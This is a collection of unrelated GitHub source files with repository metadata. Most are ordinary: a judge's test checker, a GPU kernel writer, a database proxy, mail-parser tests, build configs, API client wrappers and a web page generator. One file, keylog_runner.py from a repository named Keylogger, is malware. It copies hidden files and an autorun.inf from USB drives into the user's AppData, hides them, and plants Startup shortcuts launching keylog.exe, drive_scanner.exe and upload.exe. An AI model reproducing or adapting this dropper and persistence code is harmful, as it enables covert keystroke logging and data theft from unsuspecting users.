cstdout, stdout = self.check_test(submission, test)
submission_log = session.query(SubmissionLog).filter(db.and_(
SubmissionLog.submission_id == submission.id,
SubmissionLog.test_pair_id == test.id
)).first() or SubmissionLog(submission=submission, test_pair=test)
session.add(submission_log)
submission_log.result = submission.result
submission_log.log = cstdout
submission_log.stdout = stdout
session.commit()
if submission.result != RESULT_OK:
all_passed = False
if last_result == RESULT_OK:
last_result = submission.result
if not test_group.check_all:
break
if all_passed:
submission.score += test_group.score
else:
break
submission.current_test_id = 0
submission.result = last_result
submission.done()
return submission.result
| {
"content_hash": "65a7d3909d9ab4181fedc1777a98fb00",
"timestamp": "",
"source": "github",
"line_count": 239,
"max_line_length": 97,
"avg_line_length": 36.35146443514645,
"alnum_prop": 0.58298802946593,
"repo_name": "TsarN/pysistem",
"id": "584adf2c8edde07b61871f3abe51c6e31104fe67",
"size": "8713",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pysistem/checkers/model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "112692"
},
{
"name": "CSS",
"bytes": "7381"
},
{
"name": "HTML",
"bytes": "90904"
},
{
"name": "JavaScript",
"bytes": "904"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Pascal",
"bytes": "51054"
},
{
"name": "Python",
"bytes": "247159"
}
],
"symlink_target": ""
} |
################################################################################
#
# Copyright (C) 2020-2022 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
from copy import deepcopy
from .Common import globalParameters, CHeader
from .DataType import DataType
from .KernelWriterBase import KernelWriterBase
class KernelWriterBetaOnly(KernelWriterBase):
def __init__(self, state):
super().__init__()
self.state["ProblemType"] = deepcopy(state["ProblemType"])
self.state["_GlobalAccumulation"] = state["_GlobalAccumulation"]
# derive parameter
self.language = "HIP"
self.kernelName = self.getKernelName()
# determine chars for fast access
self.indexChars = []
for i in range(0, len(globalParameters["IndexChars"])):
self.indexChars.append(globalParameters["IndexChars"][i])
self.indexChars[self.state["ProblemType"]["Index0"]] = "0" + self.indexChars[self.state["ProblemType"]["Index0"]]
self.indexChars[self.state["ProblemType"]["Index1"]] = "1" + self.indexChars[self.state["ProblemType"]["Index1"]]
self.tileChar0 = self.indexChars[self.state["ProblemType"]["Index0"]]
self.tileChar1 = self.indexChars[self.state["ProblemType"]["Index1"]]
def functionSignature(self):
kStr = ""
# self.state name
kStr += self.endLine
kStr += "extern \"C\"" + self.endLine
kStr += "__global__ "
kStr += "void %s" % ( self.kernelName )
kStr += "(" + self.endLine
# pointers
ptrStr = self.state["ProblemType"]["DestDataType"].toDevice(self.language)
if self.state["_GlobalAccumulation"]:
ptrStr = self.state["ProblemType"]["ComputeDataType"].toDevice(self.language)
isStridedBuffer = self.state["ProblemType"]["StridedBatched"] or self.state["_GlobalAccumulation"]
ptrStr += "" if isStridedBuffer else "*"
batch = "" if isStridedBuffer else "Batch"
kStr += " " + ptrStr + " * " + batch + "D," + self.endLine
ptrStr = self.state["ProblemType"]["DestDataType"].toDevice(self.language)
isStridedBuffer = self.state["ProblemType"]["StridedBatched"]
ptrStr += "" if isStridedBuffer else "*"
batch = "" if isStridedBuffer else "Batch"
kStr += " " + ptrStr + " const * " + batch + "C," + self.endLine
# strides
firstStrideCD = 1
if self.state["ProblemType"]["UseInitialStridesCD"]:
firstStrideCD = 0
lastStrideC = self.state["ProblemType"]["NumIndicesC"]
for i in range(firstStrideCD, lastStrideC):
kStr += " unsigned int const strideD%s,%s" % (self.indexChars[i], self.endLine)
for i in range(firstStrideCD, lastStrideC):
kStr += " unsigned int const strideC%s,%s" % (self.indexChars[i], self.endLine)
# sizes
for i in range(0, self.state["ProblemType"]["NumIndicesC"]):
kStr += " unsigned int const size%s,%s" % (self.indexChars[i], self.endLine)
# offset
kStr += " unsigned int offsetD,%s" % self.endLine
kStr += " unsigned int offsetC,%s" % self.endLine
# beta
kStr += " %s const beta)%s" % (self.state["ProblemType"]["ComputeDataType"].toDevice(self.language), self.endLine )
return kStr
##############################################################################
# Kernel Body Beta-Only
##############################################################################
def kernelBodyBetaOnly(self):
problemType = self.state["ProblemType"]
globalAccum = self.state["_GlobalAccumulation"]
kStr = ""
kStr += "{%s" % self.endLine
########################################
# defined initial strides
firstStride = 0
if problemType["UseInitialStridesCD"]:
# no strides #defined
lastStrideC = 0
assert 0 # need to fix beta-clear routine to pass initial stride parms
else:
# #define initial stride
kStr += "/* hard-coded initial strides */%s" % self.endLine
lastStrideC = 1
for i in range(firstStride, lastStrideC):
kStr += "#define strideD" + self.indexChars[i] + " 1" + self.endLine
for i in range(firstStride, lastStrideC):
kStr += "#define strideC" + self.indexChars[i] + " 1" + self.endLine
########################################
# GLOBAL_D()
kStr += "#define GLOBAL_D(IDX%s" % self.indexChars[0]
for i in range(1, problemType["NumIndicesC"]):
kStr += ", IDX%s" % self.indexChars[i]
indexChar = self.indexChars[0]
kStr += ") (( (IDX%s)*strideD%s" % (indexChar, indexChar)
for i in range(1, problemType["NumIndicesC"]):
indexChar = self.indexChars[i]
kStr += " + (IDX%s)*strideD%s" % (indexChar, indexChar)
kStr += " ))" + self.endLine
# GLOBAL_C()
kStr += "#define GLOBAL_C(IDX%s" % self.indexChars[0]
for i in range(1, problemType["NumIndicesC"]):
kStr += ", IDX%s" % self.indexChars[i]
indexChar = self.indexChars[0]
kStr += ") (( (IDX%s)*strideC%s" % (indexChar, indexChar)
for i in range(1, problemType["NumIndicesC"]):
indexChar = self.indexChars[i]
kStr += " + (IDX%s)*strideC%s" % (indexChar, indexChar)
kStr += " ))" + self.endLine
########################################
# multi buffers GSU: Accumulate all GSU buffer
indexChar = self.indexChars[0]
kStr += " uint64_t id = %s(0);%s" % (self.getGlobalIdStr, self.endLine)
kStr += " if (id >= (size%s" % self.indexChars[0]
for i in range(1, problemType["NumIndicesC"]):
kStr += "*size%s" % self.indexChars[i]
kStr += "))%s" % self.endLine
kStr += " return;%s" % self.endLine
kStr += self.endLine
kStr += " uint64_t id0"
for i in range(1, problemType["NumIndicesC"]):
kStr += ", id%d" % i
kStr += ";%s" % self.endLine
for i in range(0, problemType["NumIndicesC"]):
kStr += " id%d = id %% size%s;%s" % (i, self.indexChars[i], self.endLine)
kStr += " id = id / size%s;%s" % (self.indexChars[i], self.endLine)
nonTileFreeIndices = []
# apply batch
if not self.state["ProblemType"]["StridedBatched"]:
nonTileFreeIndices = list(range(0, self.state["ProblemType"]["NumIndicesC"]))
nonTileFreeIndices.remove(self.state["ProblemType"]["Index0"])
nonTileFreeIndices.remove(self.state["ProblemType"]["Index1"])
kStr += self.endLine
kStr += " uint64_t wg = 0"
batchStride = "1"
for i in nonTileFreeIndices:
kStr += " + id%d * %s " % (i, batchStride)
batchStride += " * size%s" % self.indexChars[i]
kStr += ";" + self.endLine
if not self.state["_GlobalAccumulation"]:
ptrStr = self.state["ProblemType"]["DestDataType"].toDevice(self.language)
kStr += " " + ptrStr + " * D = BatchD[wg];" + self.endLine
ptrStr = self.state["ProblemType"]["DestDataType"].toDevice(self.language)
zeroStr = self.state["ProblemType"]["ComputeDataType"].zeroString(self.language, 1)
kStr += " " + ptrStr + f" const* C = (beta == {zeroStr}) ? nullptr : BatchC[wg];" + self.endLine
# apply offset
kStr += self.endLine
if not self.state["_GlobalAccumulation"]:
kStr += " D = D + offsetD;" + self.endLine
kStr += " C = C + offsetC;" + self.endLine
kStr += self.endLine
########################################
# D index
kStr += " %s idxD = GLOBAL_D( (%s)" % (self.uint64Str, self.uint64Str)
for i in range(problemType["NumIndicesC"]):
tmpStr = ''
if self.state["_GlobalAccumulation"]:
tmpStr = 'id%d' % i
elif i in nonTileFreeIndices:
tmpStr = '0'
else:
tmpStr = 'id%d' % i
kStr += ', ' if i else ''
kStr += tmpStr
kStr += ");%s" % (self.endLine)
# C index
kStr += " %s idxC = GLOBAL_C( (%s)" % (self.uint64Str, self.uint64Str)
for i in range(problemType["NumIndicesC"]):
kStr += ', ' if i else ''
kStr += '0' if i in nonTileFreeIndices else ('id%d' % i)
kStr += ");%s" % (self.endLine)
########################################
# zero
if globalAccum:
ptrStr = problemType["ComputeDataType"].toDevice(self.language)
if problemType["DataType"].isHalf() and problemType["HighPrecisionAccumulate"]:
ptrStr = DataType('single').toDevice(self.language)
else:
ptrStr = problemType["DataType"].toDevice(self.language)
kStr += "#define SCALAR_ZERO ((%s)(0))%s" % (ptrStr, self.endLine )
########################################
# zero
computeType = problemType["ComputeDataType"].toDevice(self.language)
kStr += " if( beta == (%s)0) {%s" % (computeType, self.endLine)
kStr += " D[idxD] = SCALAR_ZERO;%s" % self.endLine
kStr += " } else {%s" % self.endLine
kStr += " D[idxD] = ((%s)(C[idxC])) * beta;%s" % (computeType, self.endLine)
kStr += " }%s" % self.endLine
########################################
# end
kStr += "}%s" % self.endLine
for i in range(firstStride, lastStrideC):
kStr += "#undef strideD" + self.indexChars[i] + self.endLine
for i in range(firstStride, lastStrideC):
kStr += "#undef strideC" + self.indexChars[i] + self.endLine
kStr += "#undef GLOBAL_D%s" % (self.endLine)
kStr += "#undef GLOBAL_C%s" % (self.endLine)
kStr += "#undef SCALAR_ZERO%s" % ( self.endLine)
return kStr
def getKernelName(self):
indexChars = globalParameters["IndexChars"]
# C dimensions
name = "C"
for i in range(0, self.state["ProblemType"]["NumIndicesC"]):
name += indexChars[i].lower()
name += "_"
name += self.state["ProblemType"]["DestDataType"].toChar()
name += "" if self.state["ProblemType"]["StridedBatched"] else "_GB" # legacy
name += "_GA" if self.state["_GlobalAccumulation"] else ""
return name
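  # Naming sketch for a hypothetical GEMM-like problem type: three C indices,
  # DestDataType 'S' (float), StridedBatched=True and no _GlobalAccumulation
  # yield "Cijk_S"; non-strided batch appends "_GB" and GSU accumulation "_GA".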
def getSourceFileString(self):
fileString = ""
if not globalParameters["MergeFiles"]:
fileString += "\n"
fileString += "#include \"%s.h\"\n" % self.kernelName
fileString += "\n"
fileString += self.functionSignature()
fileString += self.kernelBodyBetaOnly()
return (0, fileString)
def getHeaderFileString(self):
fileString = "" # CHeader
if not globalParameters["MergeFiles"]:
fileString += CHeader
fileString += "#pragma once\n\n"
fileString += "\n"
fileString += "#include <KernelHeader.h>\n\n"
fileString += "#include <hip/hip_runtime.h>\n"
fileString += "#include <hip/hip_fp16.h>\n"
fileString += "\n"
fileString += self.functionSignature()
fileString += ";\n"
return fileString
| {
"content_hash": "06953b1d54227807a3fb216abc729b87",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 120,
"avg_line_length": 38.876254180602004,
"alnum_prop": 0.5975567790777702,
"repo_name": "ROCmSoftwarePlatform/Tensile",
"id": "50b38dd2ef7be149427d00063d9db4acaea71fd4",
"size": "11624",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "Tensile/KernelWriterBetaOnly.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "1179916"
},
{
"name": "Awk",
"bytes": "1667"
},
{
"name": "C++",
"bytes": "1570879"
},
{
"name": "CMake",
"bytes": "70754"
},
{
"name": "Dockerfile",
"bytes": "1413"
},
{
"name": "Groovy",
"bytes": "23999"
},
{
"name": "Makefile",
"bytes": "5336"
},
{
"name": "Python",
"bytes": "2699223"
},
{
"name": "Shell",
"bytes": "64197"
},
{
"name": "TeX",
"bytes": "83918"
}
],
"symlink_target": ""
} |
from taskbuffer.OraDBProxy import DBProxy
import sys
import json
class NewDBProxy(DBProxy):
'''
    Class extending OraDBProxy to add some column name mapping utilities
'''
def queryColumnSQL(self, sql, varMap = None, arraySize = 100, lowerCase = True):
comment = ' /* cacheSchedConfig column query */'
        if self.conn is None:
return None, None
try:
self.conn.begin()
self.cur.arraysize = arraySize
sys.stderr.write("querySQL : %s, %s, %s \n" % (sql, varMap, comment))
            if varMap is None:
ret = self.cur.execute(sql+comment)
else:
ret = self.cur.execute(sql+comment,varMap)
res = self.cur.fetchall()
self.conn.commit()
retList = []
            for panda_queue, data in res:
if isinstance(data, str):
dictData = json.loads(data)
elif isinstance(data, dict):
dictData = data
else:
dictData = json.loads(data.read())
dictData['siteid'] = panda_queue
retList.append(dictData)
return retList
except:
raise
def querySQL(self, sql, varMap = None, arraySize=100):
comment = ' /* cacheSchedConfig standard query */'
        if self.conn is None:
return None
try:
self.conn.begin()
self.cur.arraysize = arraySize
sys.stderr.write("querySQL : %s, %s, %s \n" % (sql, varMap, comment))
            if varMap is None:
ret = self.cur.execute(sql+comment)
else:
ret = self.cur.execute(sql+comment,varMap)
res = self.cur.fetchall()
self.conn.commit()
return res
except:
# roll back
raise
def mapRowsToDictionary(self, columnNames, rows):
resDictArray = []
for row in rows:
tmpDict = {}
for i in range(len(columnNames)):
tmpDict[columnNames[i]] = row[i]
resDictArray.append(tmpDict)
return resDictArray
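    # Illustrative call (column names and rows are made up):
    #
    #   self.mapRowsToDictionary(['siteid', 'status'], [('QUEUE_A', 'online')])
    #   # -> [{'siteid': 'QUEUE_A', 'status': 'online'}]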
| {
"content_hash": "471e901f61291249b0f06ab9c3c944f9",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 84,
"avg_line_length": 34.28125,
"alnum_prop": 0.5154968094804011,
"repo_name": "PanDAWMS/panda-cacheschedconfig",
"id": "b2c3a3f4050978bbbdc659dbd8159378ec7306b8",
"size": "2194",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cacheschedconfig/OraDBProxy2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13024"
},
{
"name": "Shell",
"bytes": "2357"
}
],
"symlink_target": ""
} |
import re
import mock
import testtools
from stackalytics.processor import mls
EMAIL_CONTENT = '''
From sorlando at nicira.com Tue Jul 17 07:30:43 2012
From: sorlando at nicira.com (Salvatore Orlando)
Date: Tue, 17 Jul 2012 00:30:43 -0700
Subject: [openstack-dev] [nova] [pci device passthrough] fails with
"NameError: global name '_' is not defined"
In-Reply-To: <[email protected]>
References: <[email protected]>
Message-ID: <[email protected]>
Good morning Gary!
-----------------
test works :)
> Reply
'''
class TestMls(testtools.TestCase):
def test_mail_parse_regex(self):
content = '''
URL: <http://lists.openstack.org/pipermail/openstack-dev/>
From sorlando at nicira.com Tue Jul 17 07:30:43 2012
From: sorlando at nicira.com (Salvatore Orlando)
Date: Tue, 17 Jul 2012 00:30:43 -0700
Subject: [openstack-dev] [nova] [pci device passthrough] fails with
"NameError: global name '_' is not defined"
In-Reply-To: <[email protected]>
References: <[email protected]>
Message-ID: <[email protected]>
Good morning Gary!
test works :)
From sorlando at nicira.com Tue Jul 17 07:30:43 2012
From: sorlando at nicira.com (Salvatore Orlando)
'''
match = re.search(mls.MAIL_BOX_PATTERN, content)
self.assertTrue(match)
self.assertEqual('sorlando at nicira.com', match.group(1))
self.assertEqual('Salvatore Orlando', match.group(2))
self.assertEqual('Tue, 17 Jul 2012 00:30:43 -0700', match.group(3))
self.assertEqual('[openstack-dev] [nova] [pci device passthrough] '
'fails with\n "NameError: global name \'_\' is not '
'defined"', match.group(4))
self.assertEqual('<CAGR=i3htLvDOdh5u6mxqmo0zVP1eKKYAxAhj='
'[email protected]>', match.group(5))
self.assertEqual('Good morning Gary!\n\ntest works :)\n',
match.group(6))
@mock.patch('stackalytics.processor.utils.read_gzip_from_uri')
@mock.patch('stackalytics.processor.mls._get_mail_archive_links')
@mock.patch('stackalytics.processor.mls._uri_content_changed')
def test_log(self, mock_uri_content_changed, mock_get_mail_archive_links,
mock_read_gzip_from_uri):
mock_uri_content_changed.return_value = True
mock_get_mail_archive_links.return_value = ['link']
mock_read_gzip_from_uri.return_value = EMAIL_CONTENT
mock_rsi = mock.Mock()
emails = list(mls.log('uri', mock_rsi))
self.assertEqual(1, len(emails))
self.assertEqual('Good morning Gary!\n\ntest works :)\n',
emails[0]['body'])
| {
"content_hash": "a1cd2036d15ae5eb4429a072444ca5e7",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 77,
"avg_line_length": 35.717948717948715,
"alnum_prop": 0.6651112706389088,
"repo_name": "0xf2/stackalytics",
"id": "3e6a2d49dd727b2656a48c39aa30b6cdbec2a452",
"size": "3368",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "stackalytics/tests/unit/test_mls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "40486"
},
{
"name": "HTML",
"bytes": "105450"
},
{
"name": "JavaScript",
"bytes": "80552"
},
{
"name": "Python",
"bytes": "441953"
},
{
"name": "Shell",
"bytes": "177"
}
],
"symlink_target": ""
} |
import os
import shutil
import wmi
import win32api
import win32con
from win32com.client import Dispatch
#Copy files from removable drive to C:\Users\USER\AppData\Local\Microsoft\Windows\Explorer\temp
#Create shortcuts pointing to keylog executable
def copy():
user = os.environ.get("USERNAME")
c = wmi.WMI()
remov_disks = c.Win32_LogicalDisk(DriveType=2)
for disk in remov_disks:
try:
#copy files
shutil.copytree(
r'%s\temp' % disk.Name,
r'C:\Users\%s\AppData\Local\Microsoft\Windows\Explorer' % user
)
shutil.copy(
r'%s\autorun.inf' % disk.Name,
r'C:\Users\%s\AppData\Local\Microsoft\Windows\Explorer' % user
)
#hide directory
win32api.SetFileAttributes(
r'C:\Users\%s\AppData\Local\Microsoft\Windows\Explorer\temp' % user,
win32con.FILE_ATTRIBUTE_HIDDEN
)
#hide autorun.inf
win32api.SetFileAttributes(
r'C:\Users\%s\AppData\Local\Microsoft\Windows\Explorer' % user,
win32con.FILE_ATTRIBUTE_HIDDEN
)
except: #Other storage device
pass
def create_shortcut(path, target="", wDir="", icon=""):
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = target
shortcut.save()
if __name__ == "__main__":
copy()
#Create keylogger shortcut in startup programs
create_shortcut(
u'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\k_short.lnk',
u'C:\\Users\\%s\\appData\\Local\\Microsoft\\Windows\\Explorer\\temp\\keylog.exe' % user
)
#Create drive_scanner shortcut in startup programs
create_shortcut(
u'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ds_short.lnk',
u'C:\\Users\\%s\\AppData\\Local\\Microsoft\\Windows\\Explorer\\temp\\drive_scanner.exe' % user
)
#Create upload shortcut in startup programs
create_shortcut(
u'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\up_short.lnk',
u'C:\\Users\\%s\\AppData\\Local\\Microsoft\\Windows\\Explorer\\temp\\upload.exe' % user
)
# | {
"content_hash": "6039ed363b6c41bcd0b3c73c48062e2b",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 96,
"avg_line_length": 32.377049180327866,
"alnum_prop": 0.7129113924050633,
"repo_name": "Brunope/Keylogger",
"id": "b1cf980f4a9c443f6f2792fd04db96ea50a841ab",
"size": "1975",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "keylog_runner.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "6296"
}
],
"symlink_target": ""
} |
"""
Test compiling and executing using the gdc tool.
"""
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/D/CoreScanner/sconstest-gdc.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
from Common.common import testForTool
testForTool('gdc')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| {
"content_hash": "71533db17e8607ab10549270a960d3c9",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 109,
"avg_line_length": 39.13513513513514,
"alnum_prop": 0.7651933701657458,
"repo_name": "EmanueleCannizzaro/scons",
"id": "6e1773be73f70ad98c40b4065df6014773e4142d",
"size": "1448",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/D/CoreScanner/sconstest-gdc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2491"
},
{
"name": "C",
"bytes": "659"
},
{
"name": "C++",
"bytes": "598"
},
{
"name": "CSS",
"bytes": "18502"
},
{
"name": "D",
"bytes": "1997"
},
{
"name": "HTML",
"bytes": "817651"
},
{
"name": "Java",
"bytes": "6860"
},
{
"name": "JavaScript",
"bytes": "215495"
},
{
"name": "Makefile",
"bytes": "3795"
},
{
"name": "Perl",
"bytes": "29978"
},
{
"name": "Python",
"bytes": "7510453"
},
{
"name": "Roff",
"bytes": "556545"
},
{
"name": "Ruby",
"bytes": "11074"
},
{
"name": "Shell",
"bytes": "52682"
},
{
"name": "XSLT",
"bytes": "7567242"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import specs.fbthrift as fbthrift
import specs.folly as folly
import specs.gmock as gmock
from shell_quoting import ShellQuoted, path_join
"fbcode_builder steps to build & test watchman"
def fbcode_builder_spec(builder):
builder.add_option("watchman/_build:cmake_defines", {"BUILD_SHARED_LIBS": "OFF"})
projects = builder.option("projects_dir")
return {
"depends_on": [gmock, folly, fbthrift],
"steps": [
builder.fb_github_cmake_install("watchman/_build", ".."),
builder.step(
"Run watchman tests",
[
builder.run(
ShellQuoted("ctest --output-on-failure -j {n}").format(
n=builder.option("make_parallelism")
)
),
builder.run(
ShellQuoted(
"cd ../ && ./runtests.py --concurrency {n} "
"--watchman-path _build/watchman --pybuild-dir {p}"
).format(
n=builder.option("make_parallelism"),
p=path_join(
projects, "../shipit_projects/watchman/_build/python"
),
)
),
],
),
],
}
config = {
"github_project": "facebook/watchman",
"fbcode_builder_spec": fbcode_builder_spec,
}
| {
"content_hash": "ee15343b15d291cfe481f21800077f20",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 85,
"avg_line_length": 31.372549019607842,
"alnum_prop": 0.476875,
"repo_name": "wez/watchman",
"id": "e9fb6a2ac3bca6a716318083502f021ea5acf556",
"size": "1622",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "build/fbcode_builder_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "68354"
},
{
"name": "C++",
"bytes": "1017051"
},
{
"name": "CMake",
"bytes": "33772"
},
{
"name": "CSS",
"bytes": "42513"
},
{
"name": "HTML",
"bytes": "36593"
},
{
"name": "Java",
"bytes": "165025"
},
{
"name": "JavaScript",
"bytes": "35291"
},
{
"name": "Python",
"bytes": "677902"
},
{
"name": "Ruby",
"bytes": "21741"
},
{
"name": "Rust",
"bytes": "69015"
},
{
"name": "Shell",
"bytes": "13265"
},
{
"name": "Thrift",
"bytes": "32316"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import sys
import warnings
from google.cloud.talent_v4beta1 import types
from google.cloud.talent_v4beta1.gapic import application_service_client
from google.cloud.talent_v4beta1.gapic import company_service_client
from google.cloud.talent_v4beta1.gapic import completion_client
from google.cloud.talent_v4beta1.gapic import enums
from google.cloud.talent_v4beta1.gapic import event_service_client
from google.cloud.talent_v4beta1.gapic import job_service_client
from google.cloud.talent_v4beta1.gapic import profile_service_client
from google.cloud.talent_v4beta1.gapic import tenant_service_client
if sys.version_info[:2] == (2, 7):
message = (
"A future version of this library will drop support for Python 2.7."
"More details about Python 2 support for Google Cloud Client Libraries"
"can be found at https://cloud.google.com/python/docs/python2-sunset/"
)
warnings.warn(message, DeprecationWarning)
class ApplicationServiceClient(application_service_client.ApplicationServiceClient):
__doc__ = application_service_client.ApplicationServiceClient.__doc__
enums = enums
class CompanyServiceClient(company_service_client.CompanyServiceClient):
__doc__ = company_service_client.CompanyServiceClient.__doc__
enums = enums
class CompletionClient(completion_client.CompletionClient):
__doc__ = completion_client.CompletionClient.__doc__
enums = enums
class EventServiceClient(event_service_client.EventServiceClient):
__doc__ = event_service_client.EventServiceClient.__doc__
enums = enums
class JobServiceClient(job_service_client.JobServiceClient):
__doc__ = job_service_client.JobServiceClient.__doc__
enums = enums
class ProfileServiceClient(profile_service_client.ProfileServiceClient):
__doc__ = profile_service_client.ProfileServiceClient.__doc__
enums = enums
class TenantServiceClient(tenant_service_client.TenantServiceClient):
__doc__ = tenant_service_client.TenantServiceClient.__doc__
enums = enums
__all__ = (
"enums",
"types",
"ApplicationServiceClient",
"CompanyServiceClient",
"CompletionClient",
"EventServiceClient",
"JobServiceClient",
"ProfileServiceClient",
"TenantServiceClient",
)
| {
"content_hash": "45fd1495bd082c6983cdf5f56b93e4ce",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 84,
"avg_line_length": 32.7,
"alnum_prop": 0.7553516819571865,
"repo_name": "tswast/google-cloud-python",
"id": "0d10d0bed3783cbe87d5e3ab1eb85178a994abf0",
"size": "2892",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "talent/google/cloud/talent_v4beta1/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "33785371"
},
{
"name": "Shell",
"bytes": "9148"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.model.naming import append_number_if_name_exists
from frappe.website.utils import cleanup_page_name
from frappe.utils import now
from frappe.modules import get_module_name, load_doctype_module
from frappe.website.doctype.website_route.website_route import remove_sitemap
class WebsiteGenerator(Document):
def autoname(self):
self.name = self.get_page_name()
append_number_if_name_exists(self)
def onload(self):
self.get("__onload").website_route = self.get_route()
def get_parent_website_route(self):
return self.get("parent_website_route", "")
def validate(self):
if self.is_condition_field_enabled() and self.meta.get_field("page_name") and not self.page_name:
self.page_name = self.get_page_name()
def on_update(self):
self.update_sitemap()
if getattr(self, "save_versions", False):
frappe.add_version(self)
def get_route(self):
parent = self.get_parent_website_route()
return ((parent + "/") if parent else "") + self.get_page_name()
def get_route_docname(self, name=None):
return frappe.db.get_value("Website Route",
{"ref_doctype":self.doctype, "docname": name or self.name})
def after_rename(self, olddn, newdn, merge):
if self.is_condition_field_enabled():
self.update_route(self.get_route_docname())
def on_trash(self):
remove_sitemap(ref_doctype=self.doctype, docname=self.name)
def is_condition_field_enabled(self):
self.controller_module = load_doctype_module(self.doctype)
if hasattr(self.controller_module, "condition_field"):
return self.get(self.controller_module.condition_field) and True or False
else:
return True
def update_sitemap(self):
# update route of all descendants
route_docname = self.get_route_docname()
if not self.is_condition_field_enabled():
frappe.delete_doc("Website Route", route_docname, ignore_permissions=True)
return
if route_docname:
self.update_route(route_docname)
else:
self.insert_route()
def update_route(self, route_docname):
route = frappe.get_doc("Website Route", route_docname)
if self.get_route() != route_docname:
route.rename(self.get_page_name(), self.get_parent_website_route())
route.idx = self.idx
route.page_title = self.get_page_title()
self.update_permissions(route)
route.save(ignore_permissions=True)
def insert_route(self):
if self.modified:
# for sitemap.xml
lastmod = frappe.utils.get_datetime(self.modified).strftime("%Y-%m-%d")
else:
lastmod = now()
route = frappe.new_doc("Website Route")
route.update({
"page_or_generator": "Generator",
"ref_doctype":self.doctype,
"idx": self.idx,
"docname": self.name,
"page_name": self.get_page_name(),
"controller": get_module_name(self.doctype, self.meta.module),
"template": self.controller_module.template,
"lastmod": lastmod,
"parent_website_route": self.get_parent_website_route(),
"page_title": self.get_page_title()
})
self.update_permissions(route)
route.ignore_links = True
route.insert(ignore_permissions=True)
def update_permissions(self, route):
if self.meta.get_field("public_read"):
route.public_read = self.public_read
route.public_write = self.public_write
else:
route.public_read = 1
def get_page_name(self):
return self.get_or_make_page_name()
def get_page_name_field(self):
return self.page_name_field if hasattr(self, "page_name_field") else "page_name"
def get_or_make_page_name(self):
page_name = self.get(self.get_page_name_field())
if not page_name:
page_name = cleanup_page_name(self.get_page_title())
if self.is_new():
self.set(self.get_page_name_field(), page_name)
